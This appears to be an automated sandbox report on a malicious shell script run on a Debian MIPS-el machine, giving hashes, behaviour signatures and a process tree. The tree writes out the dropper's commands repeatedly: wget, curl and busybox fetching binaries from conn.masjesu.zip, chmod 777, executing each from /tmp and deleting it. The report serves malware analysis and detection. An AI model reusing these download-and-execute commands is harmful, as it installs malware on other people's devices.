Analysis
-
max time kernel
118s -
max time network
120s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240611-en -
resource tags
arch:mipsel image:debian9-mipsel-20240611-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mipsel system -
submitted
25/10/2024, 01:07
Static task
static1
Behavioral task
behavioral1
Sample
1ede166afe6fc2c6ba329e84225878241755c518d519bd13895ab802b96714c6.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
1ede166afe6fc2c6ba329e84225878241755c518d519bd13895ab802b96714c6.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
1ede166afe6fc2c6ba329e84225878241755c518d519bd13895ab802b96714c6.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
1ede166afe6fc2c6ba329e84225878241755c518d519bd13895ab802b96714c6.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
1ede166afe6fc2c6ba329e84225878241755c518d519bd13895ab802b96714c6.sh
-
Size
10KB
-
MD5
1fe6de8ea9975b311fc0e7781eb48271
-
SHA1
0c4e405af7c4633878c5fe55ca2a93a111c45b28
-
SHA256
1ede166afe6fc2c6ba329e84225878241755c518d519bd13895ab802b96714c6
-
SHA512
c1f9d15954ddaecc45fbdd9d188ba6d924ed25ffc0189ce438e1268255bd408a21d55458542ccb4b443da6c83f871f85b6112b44a58955401faf873439dc7685
-
SSDEEP
192:VS45ohPHiZlxVr/SFlVGr/SFl/nFPHiZlX:VSioUQDw
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
-
Executes dropped EXE 28 IoCs
-
Reads runtime system information
description ioc Process
File opened for reading /proc/sys/crypto/fips_enabled curl
-
System Network Configuration Discovery 1 TTPs 64 IoCs
Adversaries may gather information about the network configuration of a system.
-
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/1ede166afe6fc2c6ba329e84225878241755c518d519bd13895ab802b96714c6.sh/tmp/1ede166afe6fc2c6ba329e84225878241755c518d519bd13895ab802b96714c6.sh1⤵PID:708
-
/bin/rm/bin/rm bins.sh2⤵PID:713
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg2⤵
- System Network Configuration Discovery
PID:715
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:748
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg2⤵
- System Network Configuration Discovery
PID:771
-
-
/bin/chmodchmod 777 3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg2⤵
- File and Directory Permissions Modification
PID:779
-
-
/tmp/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg./3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg2⤵
- Executes dropped EXE
PID:780
-
-
/bin/rmrm 3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg2⤵PID:783
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/N5MrCH9SmUdH1khttWtqSks9l0GT7NCA232⤵PID:784
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/N5MrCH9SmUdH1khttWtqSks9l0GT7NCA232⤵
- Reads runtime system information
- Writes file to tmp directory
PID:788
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/N5MrCH9SmUdH1khttWtqSks9l0GT7NCA232⤵
- System Network Configuration Discovery
PID:791
-
-
/bin/chmodchmod 777 N5MrCH9SmUdH1khttWtqSks9l0GT7NCA232⤵
- File and Directory Permissions Modification
PID:792
-
-
/tmp/N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23./N5MrCH9SmUdH1khttWtqSks9l0GT7NCA232⤵
- Executes dropped EXE
PID:793
-
-
/bin/rmrm N5MrCH9SmUdH1khttWtqSks9l0GT7NCA232⤵PID:794
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb2⤵
- System Network Configuration Discovery
PID:795
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:796
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb2⤵PID:798
-
-
/bin/chmodchmod 777 1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb2⤵
- File and Directory Permissions Modification
PID:799
-
-
/tmp/1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb./1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb2⤵
- Executes dropped EXE
PID:800
-
-
/bin/rmrm 1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb2⤵PID:801
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE2⤵
- System Network Configuration Discovery
PID:802
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:803
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE2⤵
- System Network Configuration Discovery
PID:810
-
-
/bin/chmodchmod 777 LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE2⤵
- File and Directory Permissions Modification
PID:813
-
-
/tmp/LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE./LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE2⤵
- Executes dropped EXE
PID:815
-
-
/bin/rmrm LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE2⤵PID:818
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm2⤵
- System Network Configuration Discovery
PID:819
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:826
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm2⤵
- System Network Configuration Discovery
PID:833
-
-
/bin/chmodchmod 777 rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm2⤵
- File and Directory Permissions Modification
PID:841
-
-
/tmp/rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm./rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm2⤵
- Executes dropped EXE
PID:843
-
-
/bin/rmrm rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm2⤵PID:845
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO2⤵
- System Network Configuration Discovery
PID:846
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:847
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO2⤵
- System Network Configuration Discovery
PID:852
-
-
/bin/chmodchmod 777 EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO2⤵
- File and Directory Permissions Modification
PID:853
-
-
/tmp/EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO./EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO2⤵
- Executes dropped EXE
PID:854
-
-
/bin/rmrm EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO2⤵PID:855
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM2⤵PID:856
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:857
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM2⤵PID:859
-
-
/bin/chmodchmod 777 Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM2⤵
- File and Directory Permissions Modification
PID:860
-
-
/tmp/Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM./Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM2⤵
- Executes dropped EXE
PID:861
-
-
/bin/rmrm Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM2⤵PID:862
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY2⤵PID:863
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:864
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY2⤵
- System Network Configuration Discovery
PID:866
-
-
/bin/chmodchmod 777 o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY2⤵
- File and Directory Permissions Modification
PID:867
-
-
/tmp/o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY./o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY2⤵
- Executes dropped EXE
PID:868
-
-
/bin/rmrm o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY2⤵PID:869
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB2⤵
- System Network Configuration Discovery
PID:870
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:871
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB2⤵
- System Network Configuration Discovery
PID:873
-
-
/bin/chmodchmod 777 k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB2⤵
- File and Directory Permissions Modification
PID:874
-
-
/tmp/k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB./k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB2⤵
- Executes dropped EXE
PID:875
-
-
/bin/rmrm k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB2⤵PID:876
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi2⤵PID:877
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:878
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi2⤵PID:880
-
-
/bin/chmodchmod 777 y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi2⤵
- File and Directory Permissions Modification
PID:881
-
-
/tmp/y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi./y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi2⤵
- Executes dropped EXE
PID:882
-
-
/bin/rmrm y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi2⤵PID:883
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/3OQh5Kw88KSPYEfCC8433pNa70Par3xFf82⤵PID:884
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/3OQh5Kw88KSPYEfCC8433pNa70Par3xFf82⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:885
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/3OQh5Kw88KSPYEfCC8433pNa70Par3xFf82⤵
- System Network Configuration Discovery
PID:887
-
-
/bin/chmodchmod 777 3OQh5Kw88KSPYEfCC8433pNa70Par3xFf82⤵
- File and Directory Permissions Modification
PID:888
-
-
/tmp/3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8./3OQh5Kw88KSPYEfCC8433pNa70Par3xFf82⤵
- Executes dropped EXE
PID:889
-
-
/bin/rmrm 3OQh5Kw88KSPYEfCC8433pNa70Par3xFf82⤵PID:890
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D2⤵
- System Network Configuration Discovery
PID:891
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:892
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D2⤵
- System Network Configuration Discovery
PID:894
-
-
/bin/chmodchmod 777 8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D2⤵
- File and Directory Permissions Modification
PID:895
-
-
/tmp/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D./8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D2⤵
- Executes dropped EXE
PID:896
-
-
/bin/rmrm 8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D2⤵PID:897
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA2⤵PID:898
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:899
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA2⤵
- System Network Configuration Discovery
PID:901
-
-
/bin/chmodchmod 777 9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA2⤵
- File and Directory Permissions Modification
PID:902
-
-
/tmp/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA./9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA2⤵
- Executes dropped EXE
PID:903
-
-
/bin/rmrm 9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA2⤵PID:904
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF2⤵
- System Network Configuration Discovery
PID:905
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:906
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF2⤵PID:908
-
-
/bin/chmodchmod 777 COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF2⤵
- File and Directory Permissions Modification
PID:909
-
-
/tmp/COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF./COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF2⤵
- Executes dropped EXE
PID:910
-
-
/bin/rmrm COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF2⤵PID:911
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D2⤵
- System Network Configuration Discovery
PID:912
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:913
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D2⤵PID:915
-
-
/bin/chmodchmod 777 8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D2⤵
- File and Directory Permissions Modification
PID:916
-
-
/tmp/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D./8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D2⤵
- Executes dropped EXE
PID:917
-
-
/bin/rmrm 8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D2⤵PID:918
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA2⤵
- System Network Configuration Discovery
PID:919
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:920
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA2⤵PID:922
-
-
/bin/chmodchmod 777 9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA2⤵
- File and Directory Permissions Modification
PID:923
-
-
/tmp/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA./9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA2⤵
- Executes dropped EXE
PID:924
-
-
/bin/rmrm 9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA2⤵PID:925
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF2⤵
- System Network Configuration Discovery
PID:926
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:927
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF2⤵PID:929
-
-
/bin/chmodchmod 777 COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF2⤵
- File and Directory Permissions Modification
PID:930
-
-
/tmp/COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF./COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF2⤵
- Executes dropped EXE
PID:931
-
-
/bin/rmrm COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF2⤵PID:932
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/N5MrCH9SmUdH1khttWtqSks9l0GT7NCA232⤵
- System Network Configuration Discovery
PID:933
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/N5MrCH9SmUdH1khttWtqSks9l0GT7NCA232⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:934
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/N5MrCH9SmUdH1khttWtqSks9l0GT7NCA232⤵
- System Network Configuration Discovery
PID:936
-
-
/bin/chmodchmod 777 N5MrCH9SmUdH1khttWtqSks9l0GT7NCA232⤵
- File and Directory Permissions Modification
PID:937
-
-
/tmp/N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23./N5MrCH9SmUdH1khttWtqSks9l0GT7NCA232⤵
- Executes dropped EXE
PID:938
-
-
/bin/rmrm N5MrCH9SmUdH1khttWtqSks9l0GT7NCA232⤵PID:939
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb2⤵
- System Network Configuration Discovery
PID:940
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:941
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb2⤵
- System Network Configuration Discovery
PID:943
-
-
/bin/chmodchmod 777 1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb2⤵
- File and Directory Permissions Modification
PID:944
-
-
/tmp/1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb./1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb2⤵
- Executes dropped EXE
PID:945
-
-
/bin/rmrm 1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb2⤵PID:946
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE2⤵PID:947
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:948
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE2⤵
- System Network Configuration Discovery
PID:950
-
-
/bin/chmodchmod 777 LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE2⤵
- File and Directory Permissions Modification
PID:951
-
-
/tmp/LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE./LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE2⤵
- Executes dropped EXE
PID:952
-
-
/bin/rmrm LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE2⤵PID:953
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm2⤵
- System Network Configuration Discovery
PID:954
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:955
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm2⤵
- System Network Configuration Discovery
PID:957
-
-
/bin/chmodchmod 777 rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm2⤵
- File and Directory Permissions Modification
PID:958
-
-
/tmp/rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm./rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm2⤵
- Executes dropped EXE
PID:959
-
-
/bin/rmrm rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm2⤵PID:960
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg2⤵PID:961
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:962
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg2⤵
- System Network Configuration Discovery
PID:964
-
-
/bin/chmodchmod 777 3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg2⤵
- File and Directory Permissions Modification
PID:965
-
-
/tmp/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg./3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg2⤵
- Executes dropped EXE
PID:966
-
-
/bin/rmrm 3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg2⤵PID:967
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO2⤵
- System Network Configuration Discovery
PID:968
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:969
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO2⤵PID:971
-
-
/bin/chmodchmod 777 EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO2⤵
- File and Directory Permissions Modification
PID:972
-
-
/tmp/EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO./EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO2⤵
- Executes dropped EXE
PID:973
-
-
/bin/rmrm EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO2⤵PID:974
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM2⤵
- System Network Configuration Discovery
PID:975
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:976
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM2⤵
- System Network Configuration Discovery
PID:978
-
-
/bin/chmodchmod 777 Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM2⤵
- File and Directory Permissions Modification
PID:979
-
-
/tmp/Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM./Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM2⤵
- Executes dropped EXE
PID:980
-
-
/bin/rmrm Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM2⤵PID:981
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY2⤵
- System Network Configuration Discovery
PID:982
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:983
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY2⤵PID:985
-
-
/bin/chmodchmod 777 o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY2⤵
- File and Directory Permissions Modification
PID:986
-
-
/tmp/o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY./o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY2⤵
- Executes dropped EXE
PID:987
-
-
/bin/rmrm o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY2⤵PID:988
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB2⤵
- System Network Configuration Discovery
PID:989
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:990
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB2⤵
- System Network Configuration Discovery
PID:992
-
-
/bin/chmodchmod 777 k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB2⤵
- File and Directory Permissions Modification
PID:993
-
-
/tmp/k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB./k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB2⤵
- Executes dropped EXE
PID:994
-
-
/bin/rmrm k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB2⤵PID:995
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi2⤵
- System Network Configuration Discovery
PID:996
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:997
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi2⤵
- System Network Configuration Discovery
PID:999
-
-
/bin/chmodchmod 777 y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi2⤵
- File and Directory Permissions Modification
PID:1000
-
-
/tmp/y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi./y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi2⤵
- Executes dropped EXE
PID:1001
-
-
/bin/rmrm y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi2⤵PID:1002
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/3OQh5Kw88KSPYEfCC8433pNa70Par3xFf82⤵
- System Network Configuration Discovery
PID:1003
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/3OQh5Kw88KSPYEfCC8433pNa70Par3xFf82⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1004
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/3OQh5Kw88KSPYEfCC8433pNa70Par3xFf82⤵
- System Network Configuration Discovery
PID:1006
-
-
/bin/chmodchmod 777 3OQh5Kw88KSPYEfCC8433pNa70Par3xFf82⤵
- File and Directory Permissions Modification
PID:1007
-
-
